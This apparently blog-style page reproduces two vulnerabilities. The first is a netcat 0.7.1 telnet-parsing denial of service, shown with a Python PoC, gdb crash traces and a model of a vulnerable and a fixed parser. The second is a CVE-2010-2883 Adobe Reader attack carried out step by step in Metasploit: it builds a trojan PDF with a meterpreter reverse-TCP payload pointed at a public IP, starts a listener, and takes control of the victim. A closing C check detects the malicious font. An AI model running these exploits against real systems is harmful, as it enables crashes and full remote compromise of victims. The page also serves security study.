Binary Vulnerability Reproduction

Published 2019-08-15, updated 2019-09-24


NETCAT (NC) 0.7.1 Remote Denial of Service Vulnerability

When nc is run with the -T option it handles telnet negotiation. If nc is used to build a telnet server and a client sends a specially crafted packet, nc parses the telnet data; because the buffer length is not reset when a piece of telnet data has been processed, repeatedly sending telnet data eventually makes nc write into memory that is not writable, and the process crashes, a remote denial of service. The vulnerability is analysed in detail below.

Software download: https://www.exploit-db.com/apps/088def25efe04dcdd1f8369d8926ab34-netcat-0.7.1.tar.gz

PoC:

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

import socket

RHOST = "127.0.0.1"
RPORT = 1111

print("[+] Connecting to %s:%d" % (RHOST, RPORT))
s = socket.create_connection((RHOST, RPORT))
s.send(b"\xFF")  # Telnet IAC control character
print("[+] Telnet control character sent")
print("[i] Starting")
i = 0
try:
    while True:  # Loop until it crashes
        i += 1
        s.send(b"\x30")
except socket.error:
    print("[+] GNU Netcat crashed on iteration: %d" % i)
```

1. Attach to the process with gdb

```gdb
file netcat
run -T -lvvp 1111   # listen on local port 1111
```


2. Run the payload remotely


```text
[----------------------------------registers-----------------------------------]
RAX: 0x21ae0
RBX: 0x0
RCX: 0x21ae1
RDX: 0x30 ('0')
RSI: 0x0
RDI: 0x7fffffffcfd0 --> 0x200000004
RBP: 0x1
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl)
R8 : 0x0
R9 : 0x20 (' ')
R10: 0x0
R11: 0x246
R12: 0x7fffffffcfd0 --> 0x200000004
R13: 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
R14: 0x1
R15: 0x1
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x405fd7 <netcat_telnet_parse+87>: je 0x406080 <netcat_telnet_parse+256>
0x405fdd <netcat_telnet_parse+93>: lea ecx,[rax+0x1]
0x405fe0 <netcat_telnet_parse+96>: lea r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl
0x405fea <netcat_telnet_parse+106>: cmp ecx,0x1
0x405fed <netcat_telnet_parse+109>: mov DWORD PTR [rip+0x203531],ecx # 0x609524 <l.5494>
0x405ff3 <netcat_telnet_parse+115>: je 0x4060f8 <netcat_telnet_parse+376>
0x405ff9 <netcat_telnet_parse+121>: movzx eax,BYTE PTR [rip+0x203521] # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0xc59568e1f6f6d600
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0
0032| 0x7fffffffc570 --> 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
0040| 0x7fffffffc578 --> 0x4
0048| 0x7fffffffc580 --> 0x1
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>: mov eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
```

Trace the call stack with the bt command:

```text
gef➤  bt
#0 netcat_telnet_parse (ncsock=ncsock@entry=0x7fffffffcfd0) at telnet.c:100
#1 0x0000000000403e18 in core_readwrite (nc_main=nc_main@entry=0x7fffffffcfd0, nc_slave=nc_slave@entry=0x7fffffffd770) at core.c:823
#2 0x0000000000402131 in main (argc=argc@entry=0x4, argv=argv@entry=0x7fffffffdc58) at netcat.c:499
#3 0x00007ffff7a2d830 in __libc_start_main (main=0x4019d0 <main>, argc=0x4, argv=0x7fffffffdc58, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdc48) at ../csu/libc-start.c:291
#4 0x0000000000402889 in _start ()
```

The crash site is 0x405fe4 <netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl.

rax is 0x21ae0 and dl is 0x30, so the store targets 0x609520 + 0x21ae0 = 0x62b000. Let's look at that address:

```text
gef➤  x/16x 0x62b000
0x62b000: Cannot access memory at address 0x62b000
gef➤ x/16x 0x62a000
0x62a000: 0x3030303030303030 0x3030303030303030
0x62a010: 0x3030303030303030 0x3030303030303030
0x62a020: 0x3030303030303030 0x3030303030303030
0x62a030: 0x3030303030303030 0x3030303030303030
0x62a040: 0x3030303030303030 0x3030303030303030
0x62a050: 0x3030303030303030 0x3030303030303030
0x62a060: 0x3030303030303030 0x3030303030303030
0x62a070: 0x3030303030303030 0x3030303030303030
```

Everything at the addresses just below has been overwritten with the payload we sent (0x30, '0'); when the write reaches 0x62b000, which is not writable, the process crashes, giving a remote denial of service.

3. Reverse analysis with IDA

Find the entry of the netcat_telnet_parse function and set a breakpoint there: b *0x0405F80


Then single-step with ni until reaching 0x405fe4 and set another breakpoint there:

```text
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x1
RDX: 0xff
RSI: 0x0
RDI: 0x7fffffffcfd0 --> 0x200000004
RBP: 0x1
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl)
R8 : 0x0
R9 : 0x20 (' ')
R10: 0x37b
R11: 0x246
R12: 0x7fffffffcfd0 --> 0x200000004
R13: 0x7fffffffc710 --> 0xff
R14: 0x1
R15: 0x1
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x405fd7 <netcat_telnet_parse+87>: je 0x406080 <netcat_telnet_parse+256>
0x405fdd <netcat_telnet_parse+93>: lea ecx,[rax+0x1]
0x405fe0 <netcat_telnet_parse+96>: lea r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl
0x405fea <netcat_telnet_parse+106>: cmp ecx,0x1
0x405fed <netcat_telnet_parse+109>: mov DWORD PTR [rip+0x203531],ecx # 0x609524 <l.5494>
0x405ff3 <netcat_telnet_parse+115>: je 0x4060f8 <netcat_telnet_parse+376>
0x405ff9 <netcat_telnet_parse+121>: movzx eax,BYTE PTR [rip+0x203521] # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0x7a3ee16a65764700
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0
0032| 0x7fffffffc570 --> 0x7fffffffc710 --> 0xff
0040| 0x7fffffffc578 --> 0x4
0048| 0x7fffffffc580 --> 0x1
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>: mov eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gef➤ b
Note: breakpoints 2 (disabled) and 3 (disabled) also set at pc 0x405fe4.
Breakpoint 5 at 0x405fe4: file telnet.c, line 100.
```

One more ni now stores our payload byte at 0x609520; check it:

```text
gef➤  x/16x 0x609520
0x609520 <getrq.5493>: 0x00000000000000ff 0x0000000000000000
0x609530: 0x0000000000000000 0x0000000000000000
0x609540: 0x0000000000000000 0x0000000000000000
0x609550: 0x0000000000000000 0x0000000000000000
0x609560: 0x0000000000000000 0x0000000000000000
0x609570: 0x0000000000000000 0x0000000000000000
0x609580: 0x0000000000000000 0x0000000000000000
0x609590: 0x0000000000000000 0x0000000000000000
```

The 0xff is the first byte the PoC sent. Now continue (c) straight to the breakpoint:

```text
[----------------------------------registers-----------------------------------]
RAX: 0x2
RBX: 0x1
RCX: 0x3
RDX: 0x30 ('0')
RSI: 0x1
RDI: 0x7fffffffcfd0 --> 0x200000004
RBP: 0x400
RSP: 0x7fffffffc550 --> 0x20 (' ')
RIP: 0x405fe4 (<netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl)
R8 : 0x0
R9 : 0x20 (' ')
R10: 0x0
R11: 0x246
R12: 0x7fffffffcfd0 --> 0x200000004
R13: 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
R14: 0x2
R15: 0x1
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x405fd7 <netcat_telnet_parse+87>: je 0x406080 <netcat_telnet_parse+256>
0x405fdd <netcat_telnet_parse+93>: lea ecx,[rax+0x1]
0x405fe0 <netcat_telnet_parse+96>: lea r14d,[rsi+0x1]
=> 0x405fe4 <netcat_telnet_parse+100>: mov BYTE PTR [rax+0x609520],dl
0x405fea <netcat_telnet_parse+106>: cmp ecx,0x1
0x405fed <netcat_telnet_parse+109>: mov DWORD PTR [rip+0x203531],ecx # 0x609524 <l.5494>
0x405ff3 <netcat_telnet_parse+115>: je 0x4060f8 <netcat_telnet_parse+376>
0x405ff9 <netcat_telnet_parse+121>: movzx eax,BYTE PTR [rip+0x203521] # 0x609521 <getrq.5493+1>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffc550 --> 0x20 (' ')
0008| 0x7fffffffc558 --> 0x7a3ee16a65764700
0016| 0x7fffffffc560 --> 0x7fffffffcfd0 --> 0x200000004
0024| 0x7fffffffc568 --> 0x7fffffffd770 --> 0x0
0032| 0x7fffffffc570 --> 0x7fffffffc710 ('0' <repeats 1024 times>, "\260\323\377\377\377\177")
0040| 0x7fffffffc578 --> 0x4
0048| 0x7fffffffc580 --> 0x1
0056| 0x7fffffffc588 --> 0x403e18 (<core_readwrite+1816>: mov eax,DWORD PTR [rbx+0x3c0])
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gef➤ x/16x 0x609520
0x609520 <getrq.5493>: 0x00000002000030ff 0x0000000000000000
0x609530: 0x0000000000000000 0x0000000000000000
0x609540: 0x0000000000000000 0x0000000000000000
0x609550: 0x0000000000000000 0x0000000000000000
0x609560: 0x0000000000000000 0x0000000000000000
0x609570: 0x0000000000000000 0x0000000000000000
0x609580: 0x0000000000000000 0x0000000000000000
0x609590: 0x0000000000000000 0x0000000000000000
```

0x609524 holds the value of rax, i.e. the number of bytes we have sent so far; each byte we send is then written at 0x609524+rax, and once that address passes the end of writable memory the process crashes.

4. Look at the decompiled pseudo-C


The buf and size pointers are both taken from the ncsock struct; in the assignment that follows, buf is written into getrq_5494, and l_5494 is a global variable.

When processing finishes, that global is not reset, which ultimately leads to the denial of service.
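To make the mechanism concrete, here is an added C model (written for this write-up, not netcat's own source) of a telnet IAC parser that gathers one command into a 4-byte buffer through an index, the getrq/l pair seen in the dumps: the vulnerable variant resets the index only when a negotiation completes, so IAC followed by an unrecognised command byte such as the PoC's 0x30 leaves every later byte indexing past the buffer, while the hardened variant resets on unknown commands. The vulnerable path is modelled arithmetically so nothing out of bounds is actually written; the names IAC/WILL/DONT, vuln_max_index, fixed_parse and the '0'-filled stream are this example's constructions.

```c
/* Added example, not netcat's own source: a minimal model of the telnet IAC
 * parser described above. Both variants gather one IAC command into a 4-byte
 * buffer through an index l, the getrq/l pair visible in the gdb dumps. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IAC  0xFF
#define WILL 0xFB          /* WILL, WONT, DO, DONT are 0xFB..0xFE */
#define DONT 0xFE
#define GETRQ_SIZE 4
static int is_negotiation(uint8_t c) { return c >= WILL && c <= DONT; }

/* Vulnerable logic, modelled arithmetically so no real out-of-bounds store
 * happens: l is reset only when a 3-byte negotiation completes. After IAC
 * plus an unrecognised command byte, every later byte would be stored at
 * getrq[l++]. Returns the largest index such a store would have used. */
size_t vuln_max_index(const uint8_t *buf, size_t len) {
    size_t l = 0, max = 0;
    uint8_t cmd = 0;
    for (size_t i = 0; i < len; i++) {
        if (l == 0 && buf[i] != IAC) continue;      /* ordinary data byte */
        if (l > max) max = l;
        if (l == 1) cmd = buf[i];                   /* command byte after IAC */
        l++;                                        /* stands for getrq[l++] = buf[i] */
        if (l == 3 && is_negotiation(cmd)) l = 0;   /* the only reset path */
    }
    return max;
}

/* Hardened logic: l is reset as soon as a command is complete or is not one
 * we handle, so it never reaches GETRQ_SIZE. Returns negotiations parsed. */
size_t fixed_parse(const uint8_t *buf, size_t len) {
    uint8_t getrq[GETRQ_SIZE];
    size_t l = 0, count = 0;
    for (size_t i = 0; i < len; i++) {
        if (l == 0 && buf[i] != IAC) continue;
        getrq[l++] = buf[i];
        if (l == 1) continue;                       /* need the command byte */
        if (!is_negotiation(getrq[1])) { l = 0; continue; }  /* drop unknown cmd */
        if (l == 3) { count++; l = 0; }             /* IAC <cmd> <option> complete */
    }
    return count;
}

/* Constructed input in the PoC's shape: one IAC followed by n bytes of '0'. */
static uint8_t stream[1 + 4096];
static size_t make_poc(size_t n) { if (n > 4096) n = 4096; stream[0] = IAC; memset(stream + 1, 0x30, n); return n + 1; }
size_t poc_vuln_index(size_t n) { return vuln_max_index(stream, make_poc(n)); }  /* n: unbounded */
size_t poc_fixed(size_t n) { return fixed_parse(stream, make_poc(n)); }          /* 0: bytes dropped */
```

With the PoC-shaped stream the vulnerable index grows one per byte sent, which is exactly why rax in the crash dump reaches 0x21ae0, while the hardened parser never indexes beyond getrq[2].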

[Vulnerability Reproduction] CVE-2010-2883 Adobe Reader: opening a PDF compromises the machine immediately

How CVE-2010-2883 works: Adobe Reader has a stack overflow in its handling of the SING table of CoolType font files; opening a specially crafted malicious PDF can allow remote arbitrary code execution.

Affected versions: Adobe Reader 8.2.4 - 9.3.4

Steps

1. In Kali Linux, generate the PDF trojan file with Metasploit

```text
Search for the Adobe exploit module
msf > search adobe_cooltype_sing
Select the exploit module
msf > use exploit/windows/fileformat/adobe_cooltype_sing/
Show the module details
msf exploit(adobe_cooltype_sing) > info
```


```text
Select the meterpreter payload, which connects back to the attacking machine
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
Set the Kali Linux IP address
msf exploit(adobe_cooltype_sing) > set LHOST 139.196.143.238
Set the local listening port
msf exploit(adobe_cooltype_sing) > set LPORT 8888
Set the name of the PDF file carrying the backdoor
msf exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf
Run the exploit to generate the file
msf exploit(adobe_cooltype_sing) > exploit
```


2. Copy the PDF trojan to /root on Linux first, then copy it to the desktop of the Windows target machine

```shell
cp /root/.msf4/local/PINGINGLAB.pdf /root/PINGINGLAB.pdf
```


3. Start a listener session in Metasploit and wait for the victim to connect back

```text
Use the handler listener module
msf > use exploit/multi/handler
Expect a reverse TCP connection
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
Set the listening IP address (same as in the PDF trojan)
msf exploit(handler) > set LHOST 139.196.143.238
Set the listening port (same as in the PDF trojan)
msf exploit(handler) > set LPORT 8888
Start listening
msf exploit(handler) > exploit
```


4. On a Windows 7 machine with Adobe Reader 9.3 installed, open the PDF with it


5. Metasploit receives the shell session, and the victim is controlled through Meterpreter

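From the defender's side, an added C example (not from the page or from Metasploit) that checks an embedded TrueType/OpenType font for the condition public analyses associate with this bug: a SING table whose 28-byte uniqueName field (offset 16 within the table, per the SING table specification) carries no NUL terminator, which the unbounded string copy in CoolType relies on. The field layout and the uniqueName attribution are assumptions stated here rather than facts from the page; the sample fonts are constructed inline.

```c
/* Added example, not from the page or Metasploit: a defensive heuristic for
 * the CVE-2010-2883 trigger. It walks an sfnt (TrueType/OpenType) table
 * directory, locates the 'SING' table and reports whether its 28-byte
 * uniqueName field (table offset 16, per the SING table specification) has
 * no NUL terminator. Public analyses attribute the overflow to an unbounded
 * string copy of that field; that attribution is this example's assumption. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static uint16_t be16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }

/* 1: SING table present and uniqueName unterminated (suspicious);
 * 0: no SING table, or uniqueName NUL-terminated; -1: malformed directory. */
int sing_name_unterminated(const uint8_t *font, size_t len) {
    if (len < 12) return -1;                             /* offset table header */
    uint16_t num_tables = be16(font + 4);
    if ((len - 12) / 16 < num_tables) return -1;         /* 16-byte table records */
    for (uint16_t i = 0; i < num_tables; i++) {
        const uint8_t *rec = font + 12 + (size_t)i * 16; /* tag, checksum, offset, length */
        if (memcmp(rec, "SING", 4) != 0) continue;
        uint32_t off = be32(rec + 8), tlen = be32(rec + 12);
        if (off > len || tlen > len - off || tlen < 16 + 28) return -1;
        return memchr(font + off + 16, 0, 28) == NULL;   /* no NUL within uniqueName */
    }
    return 0;
}

/* Constructed sample: a one-table sfnt whose SING uniqueName is 28 'A's,
 * optionally NUL-terminated. Layout: 12-byte header, 16-byte record at 12,
 * 60-byte SING table at 28 (16 header + 28 uniqueName + 16 METAMD5). */
static uint8_t sample[12 + 16 + 60];
int check_sample(int terminated) {
    memset(sample, 0, sizeof sample);
    sample[1] = 1;                                       /* sfnt version 0x00010000 */
    sample[5] = 1;                                       /* numTables = 1 */
    memcpy(sample + 12, "SING", 4);
    sample[23] = 28;                                     /* table offset */
    sample[27] = 60;                                     /* table length */
    memset(sample + 28 + 16, 'A', 28);                   /* uniqueName */
    if (terminated) sample[28 + 16 + 8] = 0;             /* "AAAAAAAA\0..." */
    return sing_name_unterminated(sample, sizeof sample);
}
```

In practice the font bytes would come from the decoded FontFile stream of a PDF; a legitimate SING uniqueName is at most 27 characters plus NUL, so a hit on this check is a strong indicator worth quarantining the document for.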

© 2019 GD